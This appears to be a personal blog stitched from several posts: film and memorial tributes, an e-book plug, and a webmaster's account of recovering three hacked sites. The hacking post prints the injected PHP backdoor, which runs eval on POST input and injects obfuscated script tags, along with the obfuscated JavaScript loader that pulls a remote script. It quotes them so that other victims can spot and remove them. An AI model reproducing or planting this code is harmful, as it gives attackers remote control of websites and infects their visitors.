Malaysia is going to celebrate its National Day in 5 days. And it reminds me of a special person: the late Yasmin Ahmad – an award winning and highly acclaimed filmmaker.

Below are a few TV commercials that I like most.

Everyone of them is equally touching and Yasmin had never forgotten to send her message across in her work to the audience: universal love (especially beyond race) and family values.

Yasmin’s videos are simple and down to earth. No fancy high tech effects. The general public can easily feel connected to the videos.

Hope you enjoy the videos too.

Petronas Chinese New Year: Old Folk’s

A few mothers bragging about how great their children are during the festive season of Chinese New Year. No matter what high-paying job a child holds, nothing beats the time he spends with mother. Spoken in authentic Penang Hokkien dialect with English subtitle.

Funeral

A TV commercial initiated by the Singapore Government. We shouldn’t be too serious but to accept imperfections in human as something beautiful… as nobody is perfect. Painfully funny. In English with Mandarin subtitle.

Family

This is my favorite video of the three. Also an initiative by the Singapore Government. It is about a father’s undying love for daughter. Narrated in English.

About two weeks ago, my websites were hacked. Not one, not two but three! If you face the same problem, this post might be useful to you as I outline the steps I have taken to overcome this problem and prevent it from happening.

SYMPTOMS

Your site is down with error:

Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1

Upon checking, most of main PHP, HTML and JavaScript files are altered. The following lines are appended in the top section of PHP pages:

<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg==’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(‘#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,’<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′)$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The following code is appended at the bottom of HTML and JS (Javascript) pages:

<!–
document.write(unescape(‘%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E’).replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,”"));
–>

If you look closely, the files that have been hacked/changed carry the same timestamp (same date and time.) I believe the hackers use a program to make the changes.

POSSIBLE CAUSES

(NOTE: It was later confirmed that FTP communication was the cause as I tried updating a site using Filezilla and sure enough the site was hacked again the next day. The other two sites that were updated with online FTP are intact.)

I search on the Internet and found that many people have experienced the same problem but no solution found.

SOLUTIONS

Step 1:

There are two possible causes. Either your web server or your computer is hacked. Before you do anything, use Lavasoft (IMPORTANT: For anti-virus, Do NOT use AVG Free as it caused another problem – inability to browse the Net – use Avira instead) or Spybot S&D (free) to detect and remove any possible spyware from your computer. You may want to scan your computer on a regular basis from now on.

(UPDATE: Yesterday, I used Malwarebytes.org to scan and remove some extra spyware which went undetected by Spybot and Avira. After the scan, I used Filezilla to upload some files to a website. I found out that the site works fine until now. CONCLUSION: Malwarebytes found the problem and fixed it better than Avira and Spybot and Lavasoft. Use this in the first place.)

Step 2:

Make sure you change your FTP passwords in cPanel first before anything else. To be sure I use online FTP instead of Filezilla to edit/upload/rename files. I don’t want my new passwords to be stolen via FTP communications.

NOTE: There’s a daily limit on transfer volume when you use Net2FTP. However, you can install net2ftp on your server.

Then take one of the steps below:

Option One: Restore from Backup

Depending on your webhost, you can either do a restore of your website yourself or you have to ask the Support team to do it for you. In this step, you want to revert your website to the day before the site is hacked.

Option Two: Do It Yourself

If you don’t have a backup from cPanel or webhost, you have no choice but to do this. This is the most time consuming one. By using a web based FTP client, upload all clean HTML and PHP pages (without the funny codes as shown above) from your own backup on your PC to your server. Of course, provided you have a mirror copy of your web pages.

If you don’t, do this: Edit the affected files directly using Net2FTP.com online by removing the extra codes.

I still find that using Net2FTP to download files to desktop and edit them with Dreamweaver, and then upload back to server using Net2FTP is faster.

For MySQL databases, I am not sure if I need to make any changes to rectify this problem. It seems that it’s not affected.

Try NOT to use Filezilla to avoid passwords being stolen again by hackers.

When you take these steps, you will get your website up and running again.

Preventive Measures

Scan your computer regularly using Spybot or Lavasoft (For anti-virus, do not use AVG Free, use Avira instead). Install firewall to protect your computer from being attacked by spyware or virus.

(UPDATE: Malwarebytes.org is the best for this problem.)

Backup your website on a regular basis using cPanel. Do backup as and when you have made changes. You can also use WordPress plugin to automate the backup process. When your site is hacked, backups come in very handy. You will be very glad that you did.

There you go. It’s has been a great experience to me as it has never crossed my mind that my sites would be hacked.

As my routine today, the first thing in the morning, I checked my emails like normal. I couldn’t believe my eyes when I read about the passing of Gary Halbert.

I quickly read other mails from Gary’s fellow marketer friends. Again, they confirmed the sad news.

Gary passed away in sleep on Sunday night, according to John Calrton.

If you don’t know Gary, he’s the world’s one of the best direct marketers.

Even though I have not met Gary in person but I love his work. Visit his website while you can, I’m not sure how long it will be there.

The news is so sudden and I still thought that Gary was okay as he just posted his newsletter April 3rd.

The news makes me think that life is short. The best bet is to live your life to the fullest. Do what matters most to you, what you enjoy. Don’t neglect your loved ones until it’s too late.

Rest in peace, Gary.

Get an idea a day delivered to your inbox.

Click “Subscribe” and enter your name and email.

You can view the archive – thousands of interesting ideas.

You can also submit an idea if you have one.

Great tool. You might find some ideas that you can turn into wealth there.

Have fun,

Abel Cheng

P.S. – I’d like to hear your comment. Post it on the blog.

I didn’t believe it when I first read it.

MYSS! used to worth $29.95. But now you can get it free.

What the heck is MYSS! anyway?

It stands for Make Your Site Sell! The book is full of practical tips on how to start a business online from scratch.

It’s one of the books that I bought when I first started. It helped me so much in creating my first site. Trust me, it’s a gem and it’s so good that the book was called…

“The BIBLE Of Selling On The Net”

Seven volumes, over 1,500 pages…

Here’s everything that’s in the MYSS! 2002 volumes…

Product — how to develop and position products for the Web.

Make Your Store Sell! — the new volume, specifically about multi-product online stores.

Site-Selling — how to make a site that convinces visitors to buy.

Traffic-Building — how to attract targeted traffic to your site.

Despite that it’s free now, MYSS! remains a great read, full of useful, evergreen ideas and information, especially if you are trying to sell a product.

Wait no more, grab it while it’s still free here.

Have fun,

Abel Cheng

P.S. Secret: The author is one of my “carefully selected” marketing icons

P.P.S. Don’t just download it and chuck it aside. Read it right after you download it. If you don’t, I bet you’ll never read it. And you know what, you’ll be missing out many powerful tips.